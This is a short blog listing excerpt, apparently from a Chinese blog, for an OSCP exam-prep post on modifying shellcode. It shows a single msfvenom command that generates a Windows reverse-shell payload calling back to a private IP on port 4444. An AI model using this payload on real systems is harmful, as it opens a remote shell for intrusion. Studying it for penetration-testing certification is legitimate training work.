摘要: OSCP Security Technology - Modifying Shellcode Generate a shellcode with msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 阅读全文
posted @ 2021-07-10 09:50 晨风_Eric 阅读(43) 评论(0) 推荐(0) 编辑